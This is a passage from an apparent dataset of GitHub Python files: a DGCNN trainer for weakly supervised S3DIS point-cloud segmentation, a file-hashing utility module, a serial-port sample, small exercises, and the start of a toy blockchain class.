sys.path.append(os.path.join(pathlib.Path(__file__).parent.absolute(),'../Util'))\n\nimport Tool\nimport DGCNN_S3DIS as network\nimport SmoothConstraint\nimport ProbLabelPropagation as PLP\n\n\nclass S3DIS_Trainer():\n\n def __init__(self, test_area):\n\n self.bestValCorrect = 0. # initial best validation performance\n\n pass\n\n def SetLearningRate(self, LearningRate, BatchSize):\n\n self.BASE_LEARNING_RATE = LearningRate\n self.BATCH_SIZE = BatchSize\n self.BN_INIT_DECAY = 0.5\n self.BN_DECAY_DECAY_RATE = 0.5\n self.DECAY_STEP = 300000\n self.DECAY_RATE = 0.5\n self.BN_DECAY_DECAY_STEP = float(self.DECAY_STEP * 2)\n self.BN_DECAY_CLIP = 0.99\n\n def get_learning_rate(self):\n learning_rate = tf.train.exponential_decay(\n self.BASE_LEARNING_RATE, # Base learning rate.\n self.batch * self.BATCH_SIZE, # Current index into the dataset.\n self.DECAY_STEP, # Decay step.\n self.DECAY_RATE, # Decay rate.\n staircase=True)\n learning_rate = tf.maximum(learning_rate, 1e-5) # CLIP THE LEARNING RATE!!\n return learning_rate\n\n def get_bn_decay(self):\n bn_momentum = tf.train.exponential_decay(\n self.BN_INIT_DECAY,\n self.batch * self.BATCH_SIZE,\n self.BN_DECAY_DECAY_STEP,\n self.BN_DECAY_DECAY_RATE,\n staircase=True)\n bn_decay = tf.minimum(self.BN_DECAY_CLIP, 1 - bn_momentum)\n return bn_decay\n\n def defineNetwork(self, batch_size, num_points, style='Full', rampup=101):\n '''\n define DGCNN network for incomplete labels as supervision\n Args:\n batch_size: batchsize for training network\n num_points: number of points for each point cloud sample\n style: model style, use full model or plain model\n rampup: rampup epoch for training\n :return:\n '''\n\n ##### Parameters\n self.rampup = rampup\n self.style = style\n\n ##### Define Network Inputs\n self.X_ph = tf.placeholder(dtype=tf.float32, shape=[batch_size, num_points, 9], name='InputPts') # B*N*3\n self.Y_ph = tf.placeholder(dtype=tf.float32, shape=[batch_size, num_points, 13], name='PartGT') # B*N*13\n self.Mask_ph = tf.placeholder(dtype=tf.float32, shape=[batch_size, num_points], name='Mask') # B*N\n self.Is_Training_ph = tf.placeholder(dtype=tf.bool, shape=(), name='IsTraining')\n\n ## Set up batch norm decay and learning rate decay\n self.batch = tf.Variable(0, trainable=False)\n bn_decay = self.get_bn_decay()\n learning_rate = self.get_learning_rate()\n\n ##### Define DGCNN network\n self.Z = network.get_model(self.X_ph, 
self.Is_Training_ph, weight_decay=0., bn_decay=bn_decay)\n\n self.Z_exp = tf.exp(self.Z)\n self.Z_prob = tf.nn.softmax(self.Z, axis=-1)\n\n ## Segmentation Branch\n loss_seg = tf.nn.softmax_cross_entropy_with_logits(labels=self.Y_ph, logits=self.Z) # B*N\n self.loss_seg = tf.reduce_sum(self.Mask_ph * loss_seg) / tf.reduce_sum(self.Mask_ph)\n\n ## Final Loss\n self.epoch = 0\n if style == 'Plain':\n # plain style training - only the labeled points are used for supervision\n self.loss = self.loss_seg\n elif style == 'Full':\n # full style training - all weakly supervised losses are used for training\n self.WeakSupLoss()\n self.loss = self.loss_seg + \\\n tf.cast(tf.greater_equal(self.epoch, self.rampup), dtype=tf.float32) * (\n self.loss_siamese + self.loss_inexact + self.loss_smooth)\n else:\n sys.exit('Loss {} is not defined!'.format(self.loss))\n\n ## Final Loss\n # self.loss = self.loss_seg + self.loss_siamese + self.loss_inexact + self.loss_smooth\n\n ##### Define Optimizer\n self.solver = tf.train.AdamOptimizer(learning_rate=learning_rate).minimize(self.loss,\n global_step=self.batch) # initialize solver\n self.saver = tf.train.Saver(max_to_keep=2)\n config = tf.ConfigProto(allow_soft_placement=False)\n config.gpu_options.allow_growth = bool(True) # Use how much GPU memory\n self.sess = tf.Session(config=config)\n self.sess.run(tf.global_variables_initializer())\n\n return True\n\n def WeakSupLoss(self):\n '''\n Define additional losses for weakly supervised segmentation\n Returns:\n\n '''\n\n ## Siamese Branch\n self.loss_siamese = 1e1 * tf.reduce_mean(tf.reduce_sum((self.Z_prob[0::2] - self.Z_prob[1::2]) ** 2, axis=-1))\n\n ## MIL Branch\n L_gt = tf.cast(tf.reduce_max(self.Y_ph, axis=1), tf.float32) # inexact labels B*13\n self.L = tf.reduce_max(self.Z, axis=1)\n loss_ineaxct = tf.nn.sigmoid_cross_entropy_with_logits(labels=L_gt, logits=self.L) # B*K\n self.loss_inexact = tf.reduce_mean(loss_ineaxct)\n\n ## Smooth Branch\n self.loss_smooth = SmoothConstraint.Loss_SpatialColorSmooth_add_SelfContain(self.Z_prob, self.X_ph[:, :, 0:6])\n\n def defLabelPropSolver(self,alpha=1e0,beta=1e0,K=10):\n ##### Define Label Propagation Solver\n self.LPSolver = PLP.LabelPropagation_TF(alpha=1e0, beta=1e0, K=10)\n self.TFComp = {}\n self.TFComp['Lmat'] = Tool.TF_Computation.LaplacianMatSym_XYZRGB_DirectComp()\n\n ##### Define Training and Evaluation functions\n def TrainOneEpoch(self, Loader, pts_idx_list=None, batch_size=12):\n '''\n Function to train one epoch\n :param Loader: Object to load training data\n :param samp_idx_list: A list indicating the labelled points B*N\n :return:\n '''\n batch_cnt = 1\n data_cnt = 0\n # shape_cnt = np.zeros(shape=[len(Loader.objcats)])\n avg_loss = 0.\n avg_acc = 0.\n\n while True:\n\n #### get next batch\n SuccessFlag, data, seg, weak_seg_onehot, mb_size, data_idx = Loader.NextBatch_TrainSet_v1()\n\n if not SuccessFlag:\n break\n\n if mb_size < batch_size:\n break\n\n #### Prepare Incomplete Labelled Training Data\n if pts_idx_list is None:\n Mask_bin = np.zeros(shape=[mb_size, data.shape[1]], dtype=np.float32) # B*N\n else:\n Mask_bin = np.zeros(shape=[mb_size, data.shape[1]], dtype=np.float32) # B*N\n for b_i in range(mb_size):\n batch_samp_idx = data_idx[b_i]\n Mask_bin[b_i, pts_idx_list[batch_samp_idx]] = 1\n Mask_bin_feed = Mask_bin\n\n #### Create Siamese Input\n data_feed = data\n\n #### Prepare Labels\n seg_onehot_feed = Tool.OnehotEncode(seg, 13)\n\n #### Train One Iteration\n _, loss_mb, Z_prob_mb = \\\n self.sess.run(\n [self.solver, self.loss, 
self.Z_prob],\n feed_dict={self.X_ph: data_feed,\n self.Y_ph: seg_onehot_feed,\n self.Is_Training_ph: True,\n self.Mask_ph: Mask_bin_feed})\n\n ## Calculate loss and correct rate\n avg_loss = (avg_loss * data_cnt + loss_mb * mb_size) / (data_cnt + mb_size)\n pred = []\n for b_i in range(mb_size):\n pred.append(np.argmax(Z_prob_mb[b_i], axis=-1))\n pred = np.stack(pred)\n avg_acc = (avg_acc * data_cnt + np.mean(pred == seg) * mb_size) / (data_cnt + mb_size)\n\n data_cnt += mb_size\n\n print(\n '\\rBatch {:d} TrainedSamp {:d} mbLoss {:.4f} '\n 'Avg Acc {:.2f}%'.format(\n batch_cnt, data_cnt, loss_mb, 100 * avg_acc),\n end='')\n\n batch_cnt += 1\n\n Loader.ResetLoader_TrainSet()\n\n # increase epoch counter by 1\n self.epoch += 1\n\n # return avg_loss, perdata_miou, pershape_miou\n return avg_loss, avg_acc\n\n def TrainOneEpoch_Full(self, Loader, pts_idx_list=None, batch_size=12):\n '''\n Function to train one epoch\n :param Loader: Object to load training data\n :param samp_idx_list: A list indicating the labelled points B*N\n :return:\n '''\n batch_cnt = 1\n data_cnt = 0\n # shape_cnt = np.zeros(shape=[len(Loader.objcats)])\n avg_loss = 0.\n avg_acc = 0.\n\n while True:\n\n #### get next batch\n SuccessFlag, data, seg, weak_seg_onehot, mb_size, data_idx = Loader.NextBatch_TrainSet_v1()\n\n if not SuccessFlag or batch_cnt > np.inf:\n break\n\n if mb_size < batch_size:\n break\n\n #### Prepare Incomplete Labelled Training Data\n if pts_idx_list is None:\n Mask_bin = np.zeros(shape=[mb_size, data.shape[1]], dtype=np.float32) # B*N\n else:\n Mask_bin = np.zeros(shape=[mb_size, data.shape[1]], dtype=np.float32) # B*N\n for b_i in range(mb_size):\n batch_samp_idx = data_idx[b_i]\n Mask_bin[b_i, pts_idx_list[batch_samp_idx]] = 1\n\n Mask_bin_feed = []\n for mask_i in Mask_bin:\n Mask_bin_feed.append(mask_i)\n Mask_bin_feed.append(mask_i)\n Mask_bin_feed = np.stack(Mask_bin_feed)\n\n #### Create Siamese Input\n if self.epoch >= self.rampup:\n data_feed = []\n for data_i in data:\n data_feed.append(data_i)\n aug_choice = np.random.choice([0, 1, 2, 3, 4, 5, 6, 7], 1)\n if aug_choice == 1:\n data_i[:, 0], data_i[:, 1] = data_i[:, 1].copy(), data_i[:, 0].copy()\n data_i[:, 6], data_i[:, 7] = data_i[:, 7].copy(), data_i[:, 6].copy()\n elif aug_choice == 2:\n data_i[:, 0] = -data_i[:, 0]\n data_i[:, 6] = -data_i[:, 6] + 1\n elif aug_choice == 3:\n data_i[:, 1] = -data_i[:, 1]\n data_i[:, 7] = -data_i[:, 7] + 1\n elif aug_choice == 4:\n data_i[:, 0] = -data_i[:, 0]\n data_i[:, 6] = -data_i[:, 6] + 1\n data_i[:, 1] = -data_i[:, 1]\n data_i[:, 7] = -data_i[:, 7] + 1\n elif aug_choice == 5:\n data_i[:, 0], data_i[:, 1] = data_i[:, 1].copy(), data_i[:, 0].copy()\n data_i[:, 6], data_i[:, 7] = data_i[:, 7].copy(), data_i[:, 6].copy()\n data_i[:, 0] = -data_i[:, 0]\n data_i[:, 6] = -data_i[:, 6] + 1\n elif aug_choice == 6:\n data_i[:, 0], data_i[:, 1] = data_i[:, 1].copy(), data_i[:, 0].copy()\n data_i[:, 6], data_i[:, 7] = data_i[:, 7].copy(), data_i[:, 6].copy()\n data_i[:, 1] = -data_i[:, 1]\n data_i[:, 7] = -data_i[:, 7] + 1\n elif aug_choice == 7:\n data_i[:, 0], data_i[:, 1] = data_i[:, 1].copy(), data_i[:, 0].copy()\n data_i[:, 6], data_i[:, 7] = data_i[:, 7].copy(), data_i[:, 6].copy()\n data_i[:, 0] = -data_i[:, 0]\n data_i[:, 6] = -data_i[:, 6] + 1\n data_i[:, 1] = -data_i[:, 1]\n data_i[:, 7] = -data_i[:, 7] + 1\n\n data_feed.append(data_i)\n\n data_feed = np.stack(data_feed, axis=0)\n else:\n data_feed = []\n for data_i in data:\n data_feed.append(data_i)\n data_feed.append(data_i)\n data_feed = 
\n\n            ## Prepare Labels\n            seg_onehot = Tool.OnehotEncode(seg, 13)\n            seg_feed_onehot = []\n            for seg_i in seg_onehot:\n                seg_feed_onehot.append(seg_i)\n                seg_feed_onehot.append(seg_i)\n            seg_feed_onehot = np.stack(seg_feed_onehot)\n\n            #### Train One Iteration\n            _, loss_mb, loss_siamese_mb, loss_mil_mb, loss_smooth_mb, Z_prob_mb = \\\n                self.sess.run(\n                    [self.solver, self.loss, self.loss_siamese, self.loss_inexact, self.loss_smooth, self.Z_prob],\n                    feed_dict={self.X_ph: data_feed,\n                               self.Y_ph: seg_feed_onehot,\n                               self.Is_Training_ph: True,\n                               self.Mask_ph: Mask_bin_feed})\n\n            ## Calculate loss and correct rate\n            avg_loss = (avg_loss * data_cnt + loss_mb * mb_size) / (data_cnt + mb_size)\n            pred = []\n            for b_i in range(mb_size):\n                pred.append(np.argmax(Z_prob_mb[2 * b_i], axis=-1))\n            pred = np.stack(pred)\n            avg_acc = (avg_acc * data_cnt + np.mean(pred == seg) * mb_size) / (data_cnt + mb_size)\n\n            data_cnt += mb_size\n\n            print(\n                '\\rBatch {:d} TrainedSamp {:d} mbLoss {:.4f} SiamLoss {:.3f} MILLoss {:.3f} SmoothLoss {:.3f} '\n                'Avg Acc {:.2f}%'.format(\n                    batch_cnt, data_cnt, loss_mb, loss_siamese_mb, loss_mil_mb, loss_smooth_mb, 100 * avg_acc),\n                end='')\n\n            batch_cnt += 1\n\n        Loader.ResetLoader_TrainSet()\n\n        # increase epoch counter by 1\n        self.epoch += 1\n\n        return avg_loss, avg_acc\n\n    def EvalOneEpoch(self, Loader):\n        batch_cnt = 1\n        samp_cnt = 0\n        avg_loss = 0.\n        avg_correct_rate = 0.\n        avg_iou = 0.\n        while True:\n\n            ## get next batch\n            SuccessFlag, data, seg, weak_seg_onehot, mb_size = Loader.NextBatch_TestSet()\n\n            if not SuccessFlag:\n                break\n\n            ## Dummy mask - every point counts during evaluation\n            Mask_bin = np.ones(shape=[mb_size, data.shape[1]], dtype=np.float32)\n\n            # feed one-hot labels (Y_ph expects them, as everywhere else in this file)\n            # and keep batch norm in inference mode while evaluating\n            loss_mb, Z_prob_mb = \\\n                self.sess.run([self.loss, self.Z_prob],\n                              feed_dict={self.X_ph: data,\n                                         self.Y_ph: Tool.OnehotEncode(seg, 13),\n                                         self.Is_Training_ph: False,\n                                         self.Mask_ph: Mask_bin})\n\n            ## Calculate loss and correct rate\n            pred_mb = np.argmax(Z_prob_mb, axis=-1)\n            correct = np.mean(pred_mb == seg)\n            m_iou = np.mean(Tool.IoU(pred_mb, seg, Loader.numParts))\n\n            avg_loss = (avg_loss * samp_cnt + loss_mb) / (samp_cnt + mb_size)\n            avg_correct_rate = (avg_correct_rate * samp_cnt + correct * mb_size) / (samp_cnt + mb_size)\n            avg_iou = (avg_iou * samp_cnt + m_iou * mb_size) / (samp_cnt + mb_size)\n\n            samp_cnt += mb_size\n\n            print('\\rBatch {:d} EvaluatedSamp {:d} Avg Loss {:.4f} Avg Correct Rate {:.3f}% Avg IoU {:.3f}%'.format(\n                batch_cnt, samp_cnt, avg_loss, 100 * avg_correct_rate, 100 * avg_iou), end='')\n\n            batch_cnt += 1\n\n        Loader.ResetLoader_TestSet()\n\n        return avg_loss, avg_correct_rate, avg_iou\n\n    def EvalOneEpoch_Full(self, Loader):\n        '''\n        Evaluate the full model for one epoch\n        Args:\n            Loader: Data loader object\n\n        Returns:\n\n        '''\n        batch_cnt = 1\n        samp_cnt = 0\n        true_positive_classes = np.zeros(shape=[13])\n        positive_classes = np.zeros(shape=[13])\n        gt_classes = np.zeros(shape=[13])\n        total_correct = 0.\n        total_seen = 0.\n        avg_loss = 0.\n        avg_correct_rate = 0.\n        iou = 0.\n\n        while True:\n\n            ## get next batch\n            SuccessFlag, data, seg_mb, weak_seg_onehot, mb_size = Loader.NextBatch_TestSet()\n\n            if not SuccessFlag:\n                break\n\n            if mb_size < Loader.batchsize:\n                data_feed = np.concatenate([data, np.tile(data[np.newaxis, 0, ...], 
[Loader.batchsize - mb_size, 1, 1])],\n axis=0)\n seg_feed = np.concatenate([seg_mb, np.tile(seg_mb[np.newaxis, 0], [Loader.batchsize - mb_size, 1])], axis=0)\n seg_Onehot_feed = Tool.OnehotEncode(seg_feed, 13)\n else:\n data_feed = data\n seg_Onehot_feed = Tool.OnehotEncode(seg_mb, 13)\n\n Mask_bin_feed = np.ones(shape=[Loader.batchsize, data.shape[1]], dtype=np.float32)\n\n ## Replicate for Siamese Network Input\n data_feed_rep = []\n seg_Onehot_feed_rep = []\n Mask_bin_feed_rep = []\n\n for b_i in range(self.BATCH_SIZE):\n data_feed_rep.append(data_feed[b_i])\n data_feed_rep.append(data_feed[b_i])\n seg_Onehot_feed_rep.append(seg_Onehot_feed[b_i])\n seg_Onehot_feed_rep.append(seg_Onehot_feed[b_i])\n Mask_bin_feed_rep.append(Mask_bin_feed[b_i])\n Mask_bin_feed_rep.append(Mask_bin_feed[b_i])\n\n data_feed_rep = np.stack(data_feed_rep, axis=0)\n seg_Onehot_feed_rep = np.stack(seg_Onehot_feed_rep, axis=0)\n Mask_bin_feed_rep = np.stack(Mask_bin_feed_rep, axis=0)\n\n loss_mb, Z_prob_mb = \\\n self.sess.run([self.loss, self.Z_prob],\n feed_dict={self.X_ph: data_feed_rep,\n self.Y_ph: seg_Onehot_feed_rep,\n self.Is_Training_ph: False,\n self.Mask_ph: Mask_bin_feed_rep})\n\n Z_prob_mb = Z_prob_mb[0:2 * mb_size:2, ...]\n\n ## Calculate loss and correct rate\n pred_mb = np.argmax(Z_prob_mb, axis=-1)\n correct = np.sum(pred_mb == seg_mb)\n acc = np.mean(pred_mb == seg_mb)\n # m_iou = np.mean(Tool.IoU(pred_mb, seg, Loader.numParts))\n total_correct += correct\n total_seen += (mb_size * Loader.NUM_POINT)\n for pred, label in zip(pred_mb,seg_mb):\n for pt_i in range(Loader.NUM_POINT):\n positive_classes[pred[pt_i]] += 1\n true_positive_classes[label[pt_i]] += float(pred[pt_i] == label[pt_i])\n gt_classes[label[pt_i]] += 1\n\n ## Calculate IoU\n iou = true_positive_classes / (\n gt_classes + positive_classes - true_positive_classes + 1e-5)\n\n avg_loss = (avg_loss * samp_cnt + loss_mb) / (samp_cnt + mb_size)\n avg_correct_rate = (avg_correct_rate * samp_cnt + acc * mb_size) / (samp_cnt + mb_size)\n # avg_iou = (avg_iou * samp_cnt + m_iou * mb_size) / (samp_cnt + mb_size)\n\n samp_cnt += mb_size\n\n print('\\rBatch {:d} EvaluatedSamp {:d} Avg Loss {:.4f} Avg Correct Rate {:.3f}% mIoU {:.3f}%'.format(\n batch_cnt, samp_cnt, avg_loss, 100 * avg_correct_rate, 100 * np.mean(iou)), end='')\n\n batch_cnt += 1\n\n Loader.ResetLoader_TestSet()\n\n\n return avg_loss, avg_correct_rate, np.mean(iou)\n\n def Test(self, Loader, PRED_PATH):\n '''\n Inference on test set\n Args:\n Loader: Data loader object\n PRED_PATH: the path to save inference results\n\n Returns:\n\n '''\n true_positive_classes = np.zeros(shape=[13])\n positive_classes = np.zeros(shape=[13])\n gt_classes = np.zeros(shape=[13])\n total_correct = 0.\n total_seen = 0.\n avg_loss = 0.\n samp_cnt = 0\n room_cnt = 0\n\n while True:\n\n ## Evaluate Each Room\n data, label, room_path = Loader.LoadNextTestRoomData_v1()\n\n if data is None:\n break\n\n ## Do inference block by block\n allPred = []\n allGT = []\n\n for blk_i, data_i, label_i in zip(range(data.shape[0]), data, label):\n\n ## Inference One Block\n feed_dict = {self.X_ph: data_i[np.newaxis, ...],\n self.Y_ph: Tool.OnehotEncode(label_i[np.newaxis, ...], 13),\n self.Mask_ph: np.ones([1, data_i.shape[0]]),\n self.Is_Training_ph: False}\n\n loss_mb, Z_prob_mb = \\\n self.sess.run([self.loss, self.Z_prob],\n feed_dict=feed_dict)\n\n ## Apply Label Propagation\n Lmat = self.TFComp['Lmat'].Eval(self.sess, data_i[np.newaxis, :, 0:3], data_i[np.newaxis, :, 3:6])\n _, Z_prob_LP, w = 
self.LPSolver.SolveLabelProp(self.sess, Lmat[0], Z_prob_mb[0])\n\n ## Evaluate Performance\n avg_loss = (avg_loss * blk_i + loss_mb * 1) / (blk_i + 1)\n pred = np.argmax(Z_prob_LP, axis=-1)\n correct = np.sum(pred == label_i)\n total_correct += correct\n total_seen += (1 * Loader.NUM_POINT)\n for pt_i in range(Loader.NUM_POINT):\n positive_classes[pred[pt_i]] += 1\n true_positive_classes[label_i[pt_i]] += float(pred[pt_i] == label_i[pt_i])\n gt_classes[label_i[pt_i]] += 1\n\n samp_cnt += 1\n\n ## Accuracy\n acc = total_correct / total_seen\n\n ## Calculate IoU\n iou = true_positive_classes / (\n gt_classes + positive_classes - true_positive_classes + 1e-5)\n\n ## Append predictions\n allPred.append(pred)\n allGT.append(label_i)\n\n print('\\rroom {:d} acc {:.2f}% iou: {:.2f}%'.format(room_cnt, 100 * acc, 100 * np.mean(iou)), end='')\n\n #### Save Predictions for Current Room\n allPred = np.concatenate(allPred, axis=0)\n allGT = np.concatenate(allGT, axis=0)\n\n room_name = room_path.split('/')[-1].split('.')[0]\n\n room_pred_filepath = os.path.join(PRED_PATH, '{}_pred_gt.mat'.format(room_name))\n\n scio.savemat(room_pred_filepath, {'data': data, 'pred': allPred, 'gt': allGT})\n\n room_cnt += 1\n\n return true_positive_classes, positive_classes, gt_classes\n\n def SaveCheckPoint(self, save_filepath, best_filename, eval_avg_correct_rate):\n\n save_filepath = os.path.abspath(save_filepath)\n\n self.saver.save(self.sess, save_filepath)\n\n filename = save_filepath.split('/')[-1]\n path = os.path.join(*save_filepath.split('/')[0:-1])\n path = '/' + path\n\n ## Save a copy of best performing model on validation set\n if self.bestValCorrect < np.mean(eval_avg_correct_rate):\n self.bestValCorrect = np.mean(eval_avg_correct_rate)\n\n src_filepath = os.path.join(path,\n '{}.data-00000-of-00001'.format(\n filename))\n # trg_filepath = os.path.join(CHECKPOINT_PATH,'Checkpoint_CAM_L2Reg_PartDropout_bestOnValid_epoch-{:d}.data-00000-of-00001'.format(epoch))\n trg_filepath = os.path.join(path,\n '{}.data-00000-of-00001'.format(\n best_filename))\n command = 'cp {:s} {:s}'.format(src_filepath, trg_filepath)\n os.system(command)\n\n src_filepath = os.path.join(path,\n '{}.index'.format(filename))\n # trg_filepath = os.path.join(CHECKPOINT_PATH,'Checkpoint_CAM_L2Reg_PartDropout_bestOnValid_epoch-{:d}.index'.format(epoch))\n trg_filepath = os.path.join(path,\n '{}.index'.format(best_filename))\n command = 'cp {:s} {:s}'.format(src_filepath, trg_filepath)\n os.system(command)\n\n src_filepath = os.path.join(path,\n '{}.meta'.format(filename))\n # trg_filepath = os.path.join(CHECKPOINT_PATH,'Checkpoint_CAM_L2Reg_PartDropout_bestOnValid_epoch-{:d}.meta'.format(epoch))\n trg_filepath = os.path.join(path,\n '{}.meta'.format(best_filename))\n command = 'cp {:s} {:s}'.format(src_filepath, trg_filepath)\n os.system(command)\n\n ########## Restore Checkpoint function\n def RestoreCheckPoint(self, filepath):\n\n self.saver.restore(self.sess, filepath)","repo_name":"alex-xun-xu/WeakSupPointCloudSeg","sub_path":"S3DIS/S3DIS_DGCNN_trainer.py","file_name":"S3DIS_DGCNN_trainer.py","file_ext":"py","file_size_in_byte":25286,"program_lang":"python","lang":"en","doc_type":"code","stars":101,"dataset":"github-code","pt":"67"} +{"seq_id":"19502708818","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n\nfrom __future__ import print_function, unicode_literals\nimport os\nimport magic\nimport json\nimport hashlib\nimport uuid\n\n\"\"\"Utils module\"\"\"\n\n\nclass utils:\n \"\"\"\n Regroupment of useful functions\n All 
methods are static\n    \"\"\"\n\n    @staticmethod\n    def check_mime_type(filename, mime_type_allowed):\n        \"\"\"\n        Check if the mime type of the file is in the allowed types\n        Return bool valid\n        \"\"\"\n        if not isinstance(mime_type_allowed, (list, tuple)):\n            raise TypeError('\"mime_type_allowed\" is not a list or a tuple')\n        mime_type = magic.from_file(filename, mime=True)\n        if(mime_type in mime_type_allowed):\n            return True\n        return False\n\n    @staticmethod\n    def generate_uuid():\n        \"\"\"\n        Get a unique id\n        Return uuid unique id\n        \"\"\"\n        return uuid.uuid4()\n\n    @staticmethod\n    def file_hash(algo, filename):\n        \"\"\"\n        Hash a file with given algorithm\n        [sha256, md5]\n        Return string hash\n        \"\"\"\n        if(algo == 'sha256'):\n            return utils.file_hash_sha256(filename)\n        elif(algo == 'md5'):\n            return utils.file_hash_md5(filename)\n\n        raise ValueError('Algorithm {} not implemented.'.format(algo))\n\n    @staticmethod\n    def file_hash_sha256(filename):\n        \"\"\"\n        Get the file SHA256\n        Return string hash\n        \"\"\"\n        h = hashlib.sha256()\n        with open(filename, 'rb', buffering=0) as f:\n            for b in iter(lambda: f.read(128*1024), b''):\n                h.update(b)\n        return h.hexdigest()\n\n    @staticmethod\n    def file_hash_md5(filename):\n        \"\"\"\n        Get the file MD5\n        Return string hash\n        \"\"\"\n        hash_md5 = hashlib.md5()\n        with open(filename, \"rb\") as f:\n            for chunk in iter(lambda: f.read(4096), b\"\"):\n                hash_md5.update(chunk)\n        return hash_md5.hexdigest()\n\n    @staticmethod\n    def file_get_contents(filename, mode='r'):\n        \"\"\"\n        Get the content of a file\n        Return string content\n        \"\"\"\n        content = ''\n        if os.path.exists(filename):\n            fp = open(filename, mode)\n            content = fp.read()\n            fp.close()\n        return content\n\n    @staticmethod\n    def file_put_contents(filename, contents):\n        \"\"\"\n        Write content to a file\n        \"\"\"\n        file = open(filename, 'w')\n        file.write(contents)\n        file.close()\n\n    @staticmethod\n    def file_get_json(filename):\n        \"\"\"\n        Load a json object from file\n        Return collection json\n        \"\"\"\n        if os.path.exists(filename):\n            if(utils.check_mime_type(filename, ['application/json', 'text/plain'])):\n                content = utils.file_get_contents(filename)\n                return json.loads(content)\n            else:\n                raise ValueError(\n                    '{} is not a valid json file.'.format(filename))\n","repo_name":"Cyberprotect/Ceres-Packet-Exploder","sub_path":"cerespacketexploder/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":2991,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"67"}
+{"seq_id":"37841789129","text":"# -*- coding: utf-8 -*-\n\nimport serial\nimport time\nimport threading\n\n\"\"\"\nSerial communication class\n\"\"\"\nclass SampleComm:\n    # Initialization\n    def __init__(self):\n        # Port-open flag (False until open() succeeds)\n        self.isPortOpen = False\n        # Received data\n        self.recvData = bytearray()\n        # Create the event used to stop send/receive\n        self.event = threading.Event()\n\n    # Wait for received data (with timeout [sec])\n    def recv(self, timeout=3):\n        # Record the start time for the timeout\n        time_start = time.time()\n        time_end = time_start\n        # Clear the thread-wait event\n        self.event.clear()\n        # Clear the receive buffer\n        self.recvData.clear()\n        # Receive result: True = success, False = failure (timeout)\n        result = False\n\n        # Wait for incoming data\n        while not self.event.is_set():\n            # Check for timeout\n            time_end = time.time()\n            if (time_end - time_start > timeout):\n                # Stop send/receive and treat it as a failure (timeout)\n                result = False\n                self.stop()\n                print(\"timeout:{0}sec\".format(timeout))\n                break\n\n            # Read received data\n            buff = self.comm.read()\n\n            # Check the received data\n            if len(buff) > 0:\n                # Append the received data\n                self.recvData.extend(buff)\n                # (Tentative) treat the reception of \\n as success\n                if (self.recvData.find(b'\\n')) >= 0:\n                    # Stop send/receive and treat it as a success\n                    result = True\n                    self.stop()\n                    break\n\n        # 
Return the result (success flag and received data)\n        return (result, self.recvData)\n\n    # Send data\n    def send(self, data):\n        self.comm.write(data)\n\n    # Stop sending/receiving\n    def stop(self):\n        self.event.set()\n\n    # Open the serial port\n    def open(self, tty, baud='115200'):\n        try:\n            self.comm = serial.Serial(tty, baud, timeout=0.1)\n            self.isPortOpen = True\n        except Exception as e:\n            self.isPortOpen = False\n\n        return self.isPortOpen\n\n    # Close the serial port (explicitly)\n    def close(self):\n        self.stop()\n        if (self.isPortOpen):\n            self.comm.close()\n            self.isPortOpen = False\n\nif __name__ == \"__main__\":\n    # Open the serial port\n    comm = SampleComm()\n    comm.open('/dev/ttyUSB0', '115200')\n\n    # Send data\n    comm.send('sample'.encode())\n    # Receive data (timeout = 10 sec)\n    result, data = comm.recv(10)\n    print(result)\n    print(data)\n\n    # Close the serial port\n    comm.close()\n","repo_name":"opckaiyo2/2021_ROV","sub_path":"test/serial/sample.py","file_name":"sample.py","file_ext":"py","file_size_in_byte":2758,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"}
+{"seq_id":"33124051133","text":"# -*- coding: utf-8 -*-\n# @Time : 2020/7/1 22:56\n# @Author : EmperorHons\n# @File : Rookie047.py\n# @Software : PyCharm\n\"\"\"\nhttps://www.runoob.com/python3/python-sum-list.html\nPython: compute the sum of the elements of a list.\nDefine a list of numbers and compute the sum of its elements.\nExample: input: [12, 15, 3, 10], output: 40\n\"\"\"\n\nimport pysnooper\n\n\n@pysnooper.snoop()\ndef List_sum(List):\n    s = 0\n    # the range must cover every index; range(0, len(List) - 1) would skip the last element\n    for i in range(len(List)):\n        s += List[i]\n    return s\n\n\nif __name__ == '__main__':\n    List = [1, 5, 2, 44, 13, 26, 39, 57, 82]\n    print(List_sum(List))","repo_name":"yusheng88/RookieInstance","sub_path":"Rookie047.py","file_name":"Rookie047.py","file_ext":"py","file_size_in_byte":571,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"}
+{"seq_id":"72141760855","text":"\ndef return_day(num):\n    week={\n        1:\"Sunday\",\n        2:\"Monday\",\n        3:\"Tuesday\",\n        4:\"Wednesday\",\n        5:\"Thursday\",\n        6:\"Friday\",\n        7:\"Saturday\"\n    }\n    if num>7 or num<1:\n        return None\n    else:\n        return week[num]\n    ","repo_name":"cpe342/PythonCourse","sub_path":"Functions/days_of_week.py","file_name":"days_of_week.py","file_ext":"py","file_size_in_byte":268,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"}
+{"seq_id":"41685952456","text":"import hashlib\nimport json\nfrom time import time\nfrom time import sleep\nimport numpy as np\nimport urllib.parse\nimport requests\nfrom dogNoseprint import noseprintshot\nfrom merkleTree import get_merkle_root\nimport random\nimport cv2\nfrom collections import Counter\nfrom dataclasses import dataclass, asdict, astuple\nfrom Cryptodome.PublicKey import RSA\nfrom Cryptodome.Hash import SHA256\nfrom Cryptodome.Signature import PKCS1_v1_5\nfrom AESCipher import AESCipher\n####### block generation & its principle\nclass Blockchain:\n    def __init__(self):\n        self.chain = []\n        self.current_transactions = []\n        self.nodes = set()\n        self.new_block(previous_hash='1', proof=100)\n    def new_block(self, proof, previous_hash=None):\n        if previous_hash is None:\n            previous_hash = self.hash(self.chain[-1])\n        block = {\n            'index' : len(self.chain) + 1,\n            'timestamp': time(),\n            'transactions': self.current_transactions,\n            'proof': proof,\n            'previous_hash': previous_hash,\n            'merkle_root': get_merkle_root(self.current_transactions)\n        }\n        self.current_transactions = []\n        self.chain.append(block)\n        return block\n    \n    # Takes a key and a value and returns the matching transaction. (Up to two keys may\n    # be given; when two are given, both input values must match the registered values\n    # for the transaction to be returned; otherwise None is returned.)
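\n    # Usage sketch (illustrative values): search_transaction('emailid', 'a@b.com') scans\n    # the blocks from newest to oldest and returns the first matching transaction, or None.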
